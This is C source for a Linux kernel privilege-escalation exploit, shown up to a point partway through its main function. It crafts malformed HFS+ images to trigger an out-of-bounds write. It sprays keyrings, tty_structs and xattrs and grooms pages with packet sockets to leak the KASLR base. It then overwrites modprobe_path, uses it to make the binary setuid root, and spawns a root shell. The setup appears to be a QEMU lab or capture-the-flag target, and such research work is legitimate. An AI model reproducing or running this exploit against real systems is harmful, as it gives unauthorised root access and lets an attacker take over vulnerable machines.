void hack_hfs_modprobe_two(unsigned char *hfs_buffer, size_t len, uint64_t kaslr_base)
{
    /* Let's check some basic information about our volume */
    parse_volume(hfs_buffer, len);

    /* First, we hack the attribute B-tree a little bit */
    resize_nodes(hfs_buffer, len);

    /* Remove root */
    remove_root(hfs_buffer, len);

    /* Corrupt key length */
    /* Pass the intended length minus 2: hfs_bnode_read_key() adds 2 back (fs/hfsplus/bnode.c#L66) */
    corrupt_key_len(hfs_buffer, len, 0x410 - 2);

/*00000000: 3cf6 b382 ffff ffff 2f62 6770 8188 ffff <......./bgp.... */

    uint8_t payload[16] = {
    0x3c, 0xf6, 0xb3, 0x82, 0xff, 0xff, 0xff, 0xff,
    0x2f, 0x62, 0x67, 0x70, 0x81, 0x88, 0xff, 0xff
    };

    if (kaslr_base) {
        /* (gdb) set *(long*)(0xffff8881019be000) = 0xffffffff82b3f638 */
        /* (gdb) set *(long*)(0xffff8881019be008) = 0xffff8881706d742f */
        /*
         * #define MODPROBE_ADDR_ONE 0xffffffff82b3f638
         * #define MODPROBE_ADDR_TWO 0xffffffff82b3f63c
         *
         * #define KERNEL_BASE 0xffffffff81000000
         */

        printf("[+] Fixing up second payload with kaslr base: %lx\n", kaslr_base);
        /* Rebase the static address onto the recovered KASLR base, then store it little-endian */
        uint64_t target = MODPROBE_ADDR_TWO - KERNEL_BASE + kaslr_base;
        for (int i = 0; i < 8; i++) {
            payload[i] = (uint8_t)((target >> (8 * i)) & 0xFF);
        }
    }


    uint16_t payload_len = sizeof(payload);

    /* Write kmalloc-1k payload */
    write_payload(hfs_buffer, len, payload, payload_len);
}

/* Function to decompress data using zlib with gzip format */
int decompress_gzip(const unsigned char *src, size_t src_len, unsigned char **dest, size_t *dest_len)
{
    z_stream strm;
    int ret;
    size_t output_size = CHUNK; /* Initial buffer size */

    /* Allocate memory for the destination buffer */
    *dest = malloc(output_size);
    if (*dest == NULL) {
        fprintf(stderr, "Memory allocation failed\n");
        return Z_MEM_ERROR;
    }

    /* Initialize the zlib stream structure */
    strm.zalloc = Z_NULL;
    strm.zfree = Z_NULL;
    strm.opaque = Z_NULL;
    strm.avail_in = src_len;
    strm.next_in = (unsigned char *)src;

    /* Initialize the zlib stream for decompression in gzip mode */
    /* 16 + MAX_WBITS enables gzip format */
    ret = inflateInit2(&strm, 16 + MAX_WBITS);
    if (ret != Z_OK) {
        /* Clean up on failure */
        free(*dest);
        return ret;
    }

    /* Track total output size */
    size_t total_out = 0;

    do {
        if (total_out + CHUNK > output_size) {
            /* Resize the buffer if it's not big enough */
            output_size += CHUNK;
            unsigned char *new_dest = realloc(*dest, output_size);

            if (new_dest == NULL) {
                inflateEnd(&strm);
                free(*dest);
                fprintf(stderr, "Reallocation failed\n");
                return Z_MEM_ERROR;
            }
            *dest = new_dest;
        }

        strm.avail_out = CHUNK;
        strm.next_out = *dest + total_out;

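        /* Perform the decompression; anything other than Z_OK or
         * Z_STREAM_END (bad data, out of memory, no progress) is fatal,
         * otherwise the loop would never terminate */
        ret = inflate(&strm, Z_NO_FLUSH);
        if (ret != Z_OK && ret != Z_STREAM_END) {
            inflateEnd(&strm);
            free(*dest);
            fprintf(stderr, "Inflate error %d during decompression\n", ret);
            return ret;
        }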
        /* Update total output size */
        total_out += CHUNK - strm.avail_out;
    } while (ret != Z_STREAM_END);

    /* Set the actual output length */
    *dest_len = total_out;

    /* Clean up */
    inflateEnd(&strm);
    return Z_OK;
}

int prepare_filesystem(void (*hfs_mutator)(unsigned char *, size_t, uint64_t), char *hfs_filename, uint64_t kaslr_base)
{
    unsigned char *compressed_data = vanilla_hfs_bin;
    size_t compressed_size = vanilla_hfs_bin_len;

    /* Output buffer */
    unsigned char *decompressed = NULL;
    size_t decompressed_len = 0;

    /* Decompress 3 times */
    for (int i = 0; i < 3; i++) {
        /* Only buffers produced by an earlier round are heap-allocated */
        unsigned char *prev = (i > 0) ? compressed_data : NULL;

        if (decompress_gzip(compressed_data, compressed_size, &decompressed, &decompressed_len) != Z_OK) {
            fprintf(stderr, "Decompression failed at iteration %d\n", i + 1);
            free(prev);
            return 1;
        }
        /* The intermediate buffer from the previous round is no longer needed */
        free(prev);
        /* For the next round, the output becomes the input */
        compressed_size = decompressed_len;
        compressed_data = decompressed;
    }
    printf("[+] Decompressed size: 0x%zx\n", decompressed_len);

    hfs_mutator(decompressed, decompressed_len, kaslr_base);

    FILE *file = fopen(hfs_filename, "wb");
    if (file == NULL) {
        perror("Failed to open the output file");
        free(decompressed);
        return 1;
    }
    size_t written = fwrite(decompressed, sizeof(unsigned char), decompressed_len, file);

    if (written != decompressed_len) {
        perror("Failed to write the buffer to the file");
        fclose(file);
        exit(EXIT_FAILURE);
    }
    fclose(file);

    /* Free the allocated memory */
    free(decompressed);

    return 0;
}

long long get_precise_time(void)
{
    struct timespec ts;

    clock_gettime(CLOCK_REALTIME, &ts);
    long long milliseconds_since_epoch =
                (long long)(ts.tv_sec) * 1000 + (long long)(ts.tv_nsec) / 1000000;
    return milliseconds_since_epoch;
}

/* Function to check if a pointer is a valid kernel pointer within the KASLR range */
bool is_valid_pointer(uint64_t ptr)
{
/* if (ptr >= KERNEL_BASE_LOWER && ptr <= KERNEL_BASE_UPPER)
 * printf("Valid pointer: %lx\n", ptr);
 */
    return (ptr >= KERNEL_BASE_LOWER && ptr <= KERNEL_BASE_UPPER);
}

/* Function to extract a 64-bit pointer from a byte buffer at a given position */
uint64_t extract_pointer(uint8_t *buffer, int pos)
{
    uint64_t ptr = 0;

    for (int i = 0; i < 8; i++) {
        /* Extract 8 bytes as a 64-bit pointer */
        ptr |= ((uint64_t)buffer[pos + i] << (i * 8));
    }
    return ptr;
}

/* Function to search for pointer triples and calculate KASLR base */
void find_pointer_triples(uint8_t *buffer, int buffer_size, int *success, uint64_t *kaslr_base_out)
{
    for (int i = 0; i < buffer_size - 8; i++) {
        /* Extract the first pointer */
        uint64_t first_ptr = extract_pointer(buffer, i);

        if (!is_valid_pointer(first_ptr))
            /* Skip invalid pointers */
            continue;


        /* Extract the second pointer at the offset */
        int second_ptr_pos = i + OFFSET_2ND_PTR;

        if (second_ptr_pos + 8 > buffer_size)
            continue;

        uint64_t second_ptr = extract_pointer(buffer, second_ptr_pos);

        if (!is_valid_pointer(second_ptr))
            continue;


        /* Extract the third pointer at the next offset */
        int third_ptr_pos = second_ptr_pos + OFFSET_3RD_PTR - OFFSET_2ND_PTR;

        if (third_ptr_pos + 8 > buffer_size)
            continue;

        uint64_t third_ptr = extract_pointer(buffer, third_ptr_pos);

        if (!is_valid_pointer(third_ptr))
            continue;

        /* Calculate the differences */
        int64_t diff_first = first_ptr - BASE_ADDR_FIRST;
        int64_t diff_second = second_ptr - BASE_ADDR_SECOND;
        int64_t diff_third = third_ptr - BASE_ADDR_THIRD;

        printf("\n[+] Pointer triple found at byte offset %x:\n", i);
        printf("\tFirst pointer: 0x%lx (Difference: 0x%lx)\n", first_ptr, diff_first);
        printf("\tSecond pointer: 0x%lx (Difference: 0x%lx)\n", second_ptr, diff_second);
        printf("\tThird pointer: 0x%lx (Difference: 0x%lx)\n", third_ptr, diff_third);

        /* If all three differences match, calculate the KASLR base */
        if (diff_first == diff_second && diff_first == diff_third) {
            uint64_t kaslr_base = diff_first + KERNEL_BASE;

            printf("\n[+] KASLR base: 0x%lx\n", kaslr_base);
            *success = 1;
            *kaslr_base_out = kaslr_base;

            /* Stop once we find the KASLR base */
            return;
        }
    }
}


sem_t *make_semaphore(int initial){
    int shm = shmget(IPC_PRIVATE, sizeof(sem_t), IPC_CREAT | 0666);

    sem_t *semaphore = shmat(shm, NULL, 0);
    sem_init(semaphore, 1, initial);
    return semaphore;
}

void set_cpu_affinity(int cpu_n, pid_t pid)
{
    cpu_set_t set;

    CPU_ZERO(&set);
    CPU_SET(cpu_n, &set);

    if (sched_setaffinity(pid, sizeof(set), &set) < 0)
        do_error_exit("sched_setaffinity");
}

void unshare_setup(void)
{
    char edit[0x100];
    int tmp_fd;

    unshare(CLONE_NEWNS | CLONE_NEWUSER | CLONE_NEWNET);

    tmp_fd = open("/proc/self/setgroups", O_WRONLY);
    write(tmp_fd, "deny", strlen("deny"));
    close(tmp_fd);

    tmp_fd = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getuid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);

    tmp_fd = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1", getgid());
    write(tmp_fd, edit, strlen(edit));
    close(tmp_fd);
}


void unshare_setup_xattr(uid_t uid, gid_t gid)
{
    int temp, ret;
    char edit[0x100];

    ret = unshare(CLONE_NEWNS | CLONE_NEWUSER);
    if (ret < 0)
        do_error_exit("unshare");

    temp = open("/proc/self/setgroups", O_WRONLY);
    write(temp, "deny", strlen("deny"));
    close(temp);

    temp = open("/proc/self/uid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1\n", uid);
    write(temp, edit, strlen(edit));
    close(temp);

    temp = open("/proc/self/gid_map", O_WRONLY);
    snprintf(edit, sizeof(edit), "0 %d 1\n", gid);
    write(temp, edit, strlen(edit));
    close(temp);

    ret = mount("none", "/", NULL, MS_REC | MS_PRIVATE, NULL);
    if (ret < 0)
        perror("mount root"); 
}

void write_file(char *path, char *buf, int size)
{
    /* O_CREAT requires an explicit mode argument */
    int fd = open(path, O_RDWR | O_CREAT, 0644);

    write(fd, buf, size);
    close(fd);
}

void prepare_mounts(void)
{
    system("mkdir /tmp/mnt0");
    system("mkdir /tmp/mnt1"); 
    system("mkdir /tmp/mnt2"); 
}


void prepare_tmpfs(void)
{
    system("mkdir /tmp/tmpfs");
    system("mount -t tmpfs -o size=50M none /tmp/tmpfs");

    write_file("/tmp/tmpfs/xattr_node", "data", 0x4);
    write_file("/tmp/tmpfs/xattr_node_2", "data", 0x4);
    write_file("/tmp/tmpfs/xattr_node_3", "data", 0x4);
}

void unlink_xattr(int id)
{
    char xattr_name[XATTR_NAME_MAX_SIZE];

    snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%d", id);
    removexattr("/tmp/tmpfs/xattr_node", xattr_name);
}

void spray_xattr(void)
{
    char xattr_name[XATTR_NAME_MAX_SIZE];
    char xattr_value[XATTR_NAME_MAX_SIZE];

    int base_nodes[] = {7, 3, 11, 1, 5, 9, 13};
    int leaf_nodes[] = {0, 2, 4, 6, 8, 10, 12, 14};
    int base_size = sizeof(base_nodes) / sizeof(base_nodes[0]);
    int leaf_size = sizeof(leaf_nodes) / sizeof(leaf_nodes[0]);

    for (int i = 100; i < 111; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", i, i);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%d", i);
        setxattr("/tmp/tmpfs/xattr_node_3", xattr_name, xattr_value, strlen(xattr_value), 0);
    }


    for (int i = 0; i < base_size; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", base_nodes[i], base_nodes[i]);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%02d", base_nodes[i]);
        setxattr("/tmp/tmpfs/xattr_node", xattr_name, xattr_value, strlen(xattr_value), 0);
    }

    for (int i = 0; i < leaf_size; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", leaf_nodes[i], leaf_nodes[i]);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%02d", leaf_nodes[i]);
        setxattr("/tmp/tmpfs/xattr_node", xattr_name, xattr_value, strlen(xattr_value), 0);
    }
}

void spray_xattr_two(void)
{
    char xattr_name[XATTR_NAME_MAX_SIZE];
    char xattr_value[XATTR_NAME_MAX_SIZE];

    int base_nodes[] = {7, 3, 11, 1, 5, 9, 13};
    int leaf_nodes[] = {0, 2, 4, 6, 8, 10, 12, 14};
    int base_size = sizeof(base_nodes) / sizeof(base_nodes[0]);
    int leaf_size = sizeof(leaf_nodes) / sizeof(leaf_nodes[0]);


    for (int i = 200; i < 211; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", i, i);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%d", i);
        setxattr("/tmp/tmpfs/xattr_node_3", xattr_name, xattr_value, strlen(xattr_value), 0);
    }

    for (int i = 0; i < base_size; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", base_nodes[i], base_nodes[i]);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%02d", base_nodes[i]);
        setxattr("/tmp/tmpfs/xattr_node_2", xattr_name, xattr_value, strlen(xattr_value), 0);
    }

    for (int i = 0; i < leaf_size; i++) {
        snprintf(xattr_value, XATTR_NAME_MAX_SIZE, "attilaszia-%d%512d", leaf_nodes[i], leaf_nodes[i]);
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%02d", leaf_nodes[i]);
        setxattr("/tmp/tmpfs/xattr_node_2", xattr_name, xattr_value, strlen(xattr_value), 0);
    }
}

char *read_modprobe_content(void) 
{
    FILE *file;
    char buffer[BUFFER_SIZE];
    char *content;

    file = fopen(MODPROBE_PATH, "r");
    if (file == NULL) {
        perror("Failed to open /proc/sys/kernel/modprobe");
        return NULL;
    }
    if (fgets(buffer, sizeof(buffer), file) == NULL) {
        perror("Failed to read from /proc/sys/kernel/modprobe");
        fclose(file);
        return NULL;
    } 
    content = (char*)malloc(strlen(buffer) + 1);
    if (content == NULL) {
        perror("Failed to allocate memory");
        fclose(file);
        return NULL;
    }
    strcpy(content, buffer); 
    fclose(file); 

    size_t len = strlen(content);

    if (len > 0 && content[len - 1] == '\n') {
        content[len - 1] = '\0';
    }

    return content;
}

int check_modprobe(void)
{
    const char *fixed_string = "/sbin/modprobe";

    usleep(100000);

    char *modprobe_content = read_modprobe_content();
    if (modprobe_content != NULL) {
        printf("[+] modprobe: %s\n", modprobe_content);
        return strcmp(modprobe_content, fixed_string);
    } else {
        do_error_exit("check_modprobe couldn't read modprobe content");
    }
}

int check_modprobe_final(void)
{
    const char *fixed_string = "/tmp/bgp";

    usleep(100000);

    char *modprobe_content = read_modprobe_content();
    if (modprobe_content != NULL) {
        printf("[+] modprobe: %s\n", modprobe_content);
        return !strncmp(modprobe_content, fixed_string, 8);
    } else {
        do_error_exit("check_modprobe_final couldn't read modprobe content");
    }
}



void check_for_modprobe_overwrite_one(void){
    char xattr_name[XATTR_NAME_MAX_SIZE];
    char xattr_value[XATTR_NAME_MAX_SIZE];

    int redblack[] = {0, 2, 4, 6, 8, 10, 12, 14};

    int success = false;

    printf("[+] Checking for xattr corruptions\n");

    int array_size = sizeof(redblack) / sizeof(redblack[0]);
    for (int i = 0; i < array_size; i++) {
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%02d", redblack[i]);
        printf("[+] current xattr to delete: %s\n", xattr_name);

        /* rbtree __rb_change_child should happen here */
        removexattr("/tmp/tmpfs/xattr_node", xattr_name);

        if (check_modprobe()) {
            printf("[+] Successfully corrupted modprobe path #1\n");
            fflush(stdout);

            system("cat /proc/sys/kernel/modprobe"); 
            success = true;
            sleep(1);
            break;
        }
    }
    if (!success){
        sleep(1);
        do_error_exit("Couldn't overwrite first part of modprobe"); 
    }

}

void check_for_modprobe_overwrite_two(void){
    char xattr_name[XATTR_NAME_MAX_SIZE];
    char xattr_value[XATTR_NAME_MAX_SIZE];

    int redblack[] = {0, 2, 4, 6, 8, 10, 12, 14};

    int success = false;

    printf("[+] Checking for xattr corruptions\n");

    int array_size = sizeof(redblack) / sizeof(redblack[0]);
    for (int i = 0; i < array_size; i++) {
        snprintf(xattr_name, XATTR_NAME_MAX_SIZE, "security.%02d", redblack[i]);
        printf("[+] current xattr to delete: %s\n", xattr_name);

        /* rbtree __rb_change_child should happen here */
        removexattr("/tmp/tmpfs/xattr_node_2", xattr_name);

        if (check_modprobe_final()) {
            printf("[+] Successfully corrupted modprobe path #2\n");
            fflush(stdout);

            system("cat /proc/sys/kernel/modprobe"); 
            success = true;
            sleep(5);
            break;
        }
    }
    if (!success){
        sleep(1);
        do_error_exit("Couldn't overwrite modprobe"); 
    }

}

void trigger_oob(void)
{
    key_serial_t *id_buffer;

    id_buffer = spray_keyring(SPRAY_KEY_SIZE, SPRAY_KEY_SIZE_INIT);

    spray_tty_struct(SPRAY_TTY_SIZE);

    char *attr_value = "dummy";
    int result = setxattr("/tmp/mnt0/hacked_node", "user.1", attr_value, strlen(attr_value), 0);

    if (result != 0)
        do_error_exit("setxattr attempt on vuln fs");

    kaslr_base_recovered = get_keyring_leak(id_buffer, (uint32_t)SPRAY_KEY_SIZE);
    sleep(1);

    release_keys(id_buffer, SPRAY_KEY_SIZE);
}

void trigger_oob_xattr(void)
{
    char *attr_value = "dummy";
    int result = setxattr("/tmp/mnt1/hacked_node", "user.1", attr_value, strlen(attr_value), 0);

    if (result != 0)
        do_error_exit("setxattr attempt on vuln fs"); 
}

void trigger_oob_xattr_two(void)
{
    char *attr_value = "dummy";
    int result = setxattr("/tmp/mnt2/hacked_node", "user.1", attr_value, strlen(attr_value), 0);

    if (result != 0)
        do_error_exit("setxattr attempt on vuln fs"); 
}


/* Function to monitor /proc/contig_alloc_info */
void *monitor_function(void *arg)
{
    int consecutive_ones = 0;

    const int required_consecutive = 10;
    /* 0.1 seconds in microseconds */
    const useconds_t interval = 100000;

    while (1) {
        char buffer[128];
        FILE *file;

        /* Open the file for reading */
        file = fopen("/proc/contig_alloc_info", "r");
        if (file == NULL) {
            perror("Failed to open /proc/contig_alloc_info");
            pthread_exit(NULL);
        }

        /* Read a line from the file */
        if (fgets(buffer, sizeof(buffer), file) != NULL) {
            int value;
            char timestamp[64];

            /* Parse the timestamp and value */
            /* %63s bounds the read to the size of timestamp[] */
            if (sscanf(buffer, "%63s %d", timestamp, &value) == 2) {
                if (value == 1) {
                    consecutive_ones++;
                    if (consecutive_ones == required_consecutive) {
                        printf("Value is 1 for %d consecutive checks at %s\n", required_consecutive, timestamp);
                        printf("UNIX timestamp at side-channel trigger: %lld\n", get_precise_time());
                        // trigger_oob();
                    }
                } else {
                    /* Reset the counter if value is not 1 */
                    consecutive_ones = 0;
                }
            } else {
                fprintf(stderr, "Failed to parse the line: %s", buffer);
            }
        } else {
            fprintf(stderr, "Failed to read from /proc/contig_alloc_info\n");
        }

        fclose(file);

        usleep(interval);
    }
    return NULL;
}

void print_contiginfo(void)
{
    char buffer[128];
    FILE *pipe;

    pipe = popen("cat /proc/contig_alloc_info", "r");
    if (pipe == NULL) {
        do_error_exit("popen failed");
        return;
    }

    while (fgets(buffer, sizeof(buffer), pipe) != NULL)
        printf("%s", buffer);

    pclose(pipe);
}

void print_buddyinfo(void)
{
    char buffer[128];
    FILE *pipe;

    pipe = popen("cat /proc/buddyinfo", "r");
    if (pipe == NULL)
        do_error_exit("popen failed");

    while (fgets(buffer, sizeof(buffer), pipe) != NULL)
        printf("%s", buffer);

    pclose(pipe);
}

/* pipe for cmd communication */
int cmd_pipe_req[2], cmd_pipe_reply[2];

/* create a socket and alloc pages, return the socket fd */
int create_socket_and_alloc_pages(unsigned int size, unsigned int nr)
{
    struct tpacket_req req;
    int socket_fd, version;
    int ret;

    socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (socket_fd < 0) {
        printf("[-] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
        ret = socket_fd;
        goto err_out;
    }

    version = TPACKET_V1;
    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION,
                     &version, sizeof(version));
    if (ret < 0) {
        printf("[-] failed at setsockopt(PACKET_VERSION)\n");
        goto err_setsockopt;
    }

    memset(&req, 0, sizeof(req));
    req.tp_block_size = size;
    req.tp_block_nr = nr;
    req.tp_frame_size = 0x1000;
    req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size;

    ret = setsockopt(socket_fd, SOL_PACKET, PACKET_TX_RING, &req, sizeof(req));
    if (ret < 0) {
        printf("[-] failed at setsockopt(PACKET_TX_RING)\n");
        goto err_setsockopt;
    }

    return socket_fd;

err_setsockopt:
    close(socket_fd);
err_out:
    return ret;
}

/* the parent process should call it to send command of allocation to child */
int alloc_page(int idx, unsigned int size, unsigned int nr)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_ALLOC_PAGE,
        .size = size,
        .nr = nr,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret;
}

int exit_child(void) {
    struct pgv_page_request req = { 
        .cmd = CMD_EXIT
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(struct pgv_page_request));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    return ret; 
}

/* the parent process should call it to send command of freeing to child */
int free_page(int idx)
{
    struct pgv_page_request req = {
        .idx = idx,
        .cmd = CMD_FREE_PAGE,
    };
    int ret;

    write(cmd_pipe_req[1], &req, sizeof(req));
    read(cmd_pipe_reply[0], &ret, sizeof(ret));

    usleep(10000);

    return ret;
}

void spray_cmd_handler(void)
{
    struct pgv_page_request req;
    int socket_fd[PGV_PAGE_NUM];
    int ret;

    /* Create an isolated namespace*/
    unshare_setup();

    /* Handle requests */
    do {
        read(cmd_pipe_req[0], &req, sizeof(req));

        if (req.cmd == CMD_ALLOC_PAGE) {
            ret = create_socket_and_alloc_pages(req.size, req.nr);
            socket_fd[req.idx] = ret;
        } else if (req.cmd == CMD_FREE_PAGE) {
            ret = close(socket_fd[req.idx]);
        } else if (req.cmd == CMD_EXIT) {
            ret = 0;
            write(cmd_pipe_reply[1], &ret, sizeof(ret));
            printf("[+] Exiting\n");
            break;
        } else {
            /* Report a defined error value instead of an uninitialized one */
            ret = -1;
            printf("[-] invalid request: %d\n", req.cmd);
        }

        write(cmd_pipe_reply[1], &ret, sizeof(ret));
    } while (req.cmd != CMD_EXIT);

    printf("[+] Finished command handler\n");
    _exit(0);
}

pid_t prepare_pgv_system(void)
{
    pid_t pid;
    /* Pipe for pgv */
    pipe(cmd_pipe_req);
    pipe(cmd_pipe_reply);

    /* Child process for pages spray */
    pid = fork();
    if (!pid)
        spray_cmd_handler();
    else {
        printf("[+] Kicked off spray process %d\n", pid);
        return pid;
    }
}

/* Spray pages in different size for various usages and trigger first OOB */
void prepare_pgv_pages_cross_oob(void)
{
#ifdef DEBUG_CROSSCACHE
    print_contiginfo();
    print_buddyinfo();
#endif 
    /*
     * We want cleaner, more contiguous memory here, which requires
     * reducing the noise in order-3 page allocations.
     * So we pre-allocate pages for the noisy objects first.
     */
    puts("[*] spray pgv order-0 pages...");
    for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
        if (alloc_page(i, 0x1000, 1) < 0)
            printf("[-] failed to create %d socket for pages spraying!\n", i);
    }
#ifdef DEBUG_CROSSCACHE
    print_contiginfo();
    print_buddyinfo();
#endif 


    puts("[*] spray pgv order-1 pages...");
    for (int i = 0; i < PGV_1PAGE_SPRAY_NUM; i++) {
        if (alloc_page(i, 0x1000 * 2, 1) < 0)
            printf("[-] failed to create %d socket for pages spraying!\n", i);
    }

#ifdef DEBUG_CROSSCACHE
    print_contiginfo();
    print_buddyinfo();
#endif
    puts("[*] spray pgv order-2 pages...");
    for (int i = 0; i < PGV_4PAGES_SPRAY_NUM; i++) {
        if (i == 2) {
            /* This looks arbitrary AF, but I made a bunch of measurements and undergrad level stats that support it */
            usleep(166000);

            printf("[+] UNIX timestamp at page-2 splitting: %lld\n", get_precise_time());
            trigger_oob();
        }

        if (alloc_page(PGV_4PAGES_START_IDX + i, 0x1000 * 4, 1) < 0)
            printf("[-] failed to create %d socket for pages spraying!\n", i);
    }

#ifdef DEBUG_CROSSCACHE
    print_contiginfo();
    print_buddyinfo();
#endif

    /* Spray 8 pages for page-level heap fengshui */
    puts("[*] spray pgv order-3 pages...");
    for (int i = 0; i < PGV_8PAGES_SPRAY_NUM; i++) {
        /* A socket needs 1 sock_inode_cache object: 19 objects per slab, 4 pages per slab */
        if (i % 19 == 0)
            free_page(pgv_4pages_start_idx++);

        /* A socket needs 1 dentry object: 21 objects per slab, 1 page per slab */
        if (i % 21 == 0)
            free_page(pgv_1page_start_idx += 2);

        /* A pgv needs 1 kmalloc-8 object: 512 objects per slab, 1 page per slab */
        if (i % 512 == 0)
            free_page(pgv_1page_start_idx += 2);

        if (alloc_page(PGV_8PAGES_START_IDX + i, 0x1000 * 8, 1) < 0)
            printf("[-] failed to create %d socket for pages spraying!\n", i);
    }
#ifdef DEBUG_CROSSCACHE 
    print_contiginfo();
    print_buddyinfo();
#endif 
}

uint64_t parse_leak(uint8_t *buffer, uint32_t buffer_size)
{
    int success;
    uint64_t kaslr_base_found;
/*
    for (uint32_t i = 0; i < buffer_size; i++)
        printf("%02x", buffer[i]);
    printf("\n");
*/    
    success = 0;

    /* Process the buffer to find pointer triples and calculate KASLR base */
    find_pointer_triples(buffer, buffer_size, &success, &kaslr_base_found);
    if (!success)
        do_error_exit("Could not recover KASLR base\n");

    return kaslr_base_found;
}

void spray_tty_struct(int max)
{
    int spray[100];

    printf("[+] Spraying tty_structs\n");

    for (int i = 0; i < max; i++) {
        spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY);
    }
}


key_serial_t *spray_keyring(uint32_t spray_size, uint32_t offset)
{
    char key_desc[KEY_DESC_MAX_SIZE];
    key_serial_t *id_buffer = calloc(spray_size, sizeof(key_serial_t));

    if (id_buffer == NULL)
        do_error_exit("calloc");

    printf("[+] Spraying keys...");
    for (uint32_t i = 0; i < spray_size; i++) { 
        snprintf(key_desc, KEY_DESC_MAX_SIZE, "attilaszia-%d%498d", offset + i, offset + i);

        id_buffer[i] = add_key("user", key_desc, key_desc, strlen(key_desc), KEY_SPEC_PROCESS_KEYRING);
        if (id_buffer[i] < 0)
            do_error_exit("add_key");
    }
    printf("done\n");

    return id_buffer;
}

uint64_t get_keyring_leak(key_serial_t *id_buffer, uint32_t id_buffer_size)
{
    uint8_t buffer[USHRT_MAX] = {0};
    int32_t keylen;

    printf("[+] Checking sprayed keys for corruption\n");
    for (uint32_t i = 0; i < id_buffer_size; i++) {

        keylen = keyctl(KEYCTL_READ, id_buffer[i], (long)buffer, USHRT_MAX, 0);

        if (keylen < 0)
            continue;

        if (keylen > 1024) {
            printf("[+] Found corrupted key, triggering infoleak\n");
            return parse_leak(buffer, keylen);
        }
    }
    return 0;
}

void release_keys(key_serial_t *id_buffer, uint32_t id_buffer_size)
{
    printf("[+] Releasing %u keys\n", id_buffer_size);

    for (uint32_t i = 0; i < id_buffer_size; i++) {
        if (keyctl(KEYCTL_REVOKE, id_buffer[i], 0, 0, 0) < 0)
            perror("keyctl(KEYCTL_REVOKE)");
        if (keyctl(KEYCTL_UNLINK, id_buffer[i], KEY_SPEC_PROCESS_KEYRING, 0, 0) < 0)
            perror("keyctl(KEYCTL_UNLINK)");
    }

    free(id_buffer);
}


int qemu_mount_oracle(char *file_path, char *loop_device_path, char *mount_point)
{
    char command[1024];
    snprintf(command, sizeof(command), "/qemu_oracle mount %s %s %s", file_path, loop_device_path, mount_point);
    system(command);

    return 0;
}

int qemu_umount_oracle(char *file_path, char *loop_device_path, char *mount_point)
{
    char command[1024];
    snprintf(command, sizeof(command), "/qemu_oracle unmount %s %s %s", file_path, loop_device_path, mount_point);
    system(command);

    return 0;
}

void set_myself_suid(char *my_path)
{
    char *script = malloc(0x200);
    char *modprobe_path = read_modprobe_content();

    sprintf(script, "#!/bin/bash\nchown root:root %s\nchmod u+s %s\n", my_path, my_path);
    write_file(modprobe_path, script, strlen(script));

    sprintf(script, "chmod 700 %s\n", modprobe_path);
    system(script);

    write_file("/tmp/z", "\xff\xff\xff\xff\xff\xff", 6);
    system("chmod 700 /tmp/z");

    // Trigger modprobe_path
    system("/tmp/z 2>/dev/null");
    printf("[+] setuid bit set\n");
}

int main(int argc, char **argv)
{
    key_serial_t *id_buffer;
    char *xattr_target_filename;
    struct write4_payload payload;
    pthread_t monitor_thread;
    pid_t pid;
    int status; 

/* Root shell part */    
    uid_t euid = geteuid(); 

    if (euid == 0)
    {
        // Got root!
        printf("[+] Popping root shell, courtesy of @4ttil4sz1a\n");

        setuid(0);
        setgid(0);
        char *args[] = {"/bin/sh", NULL};
        execve("/bin/sh", args, NULL);

        return 0;
    } 

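    char *dir_path = malloc(0x200);
    getcwd(dir_path, 0x200);
    char *path = malloc(PATH_MAX);
    /* readlink() does not NUL-terminate, so terminate the result explicitly */
    ssize_t path_len = readlink("/proc/self/exe", path, PATH_MAX - 1);
    if (path_len < 0)
        do_error_exit("readlink");
    path[path_len] = '\0';
    printf("[+] Running at %s\n", path);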


    sem_t *sem_pop_shell = make_semaphore(0);

    if (!fork()) {
        sem_wait(sem_pop_shell);
        char *args[] = {path, NULL};
        execve(path, args, NULL);
    }

/* Initialization */    

    set_cpu_affinity(0, 0);

    printf("[+] Running as UID=%d, GID=%d\n", getuid(), getgid());

    prepare_mounts();

/* KASLR leak part */    

    prepare_filesystem(hack_hfs_keyring, "/tmp/malformed_ring.raw", 0);

    qemu_mount_oracle("/tmp/malformed_ring.raw", "/dev/loop1", "/tmp/mnt0/");


#ifdef DEBUG_CROSSCACHE
    if (pthread_create(&monitor_thread, NULL, monitor_function, NULL) != 0)
        do_error_exit("Failed to create the monitor thread");
#endif


    id_buffer = spray_keyring(SPRAY_KEY_SIZE_INIT, 0);

    spray_tty_struct(SPRAY_TTY_INITIAL);

    pid = prepare_pgv_system();

    prepare_pgv_pages_cross_oob();

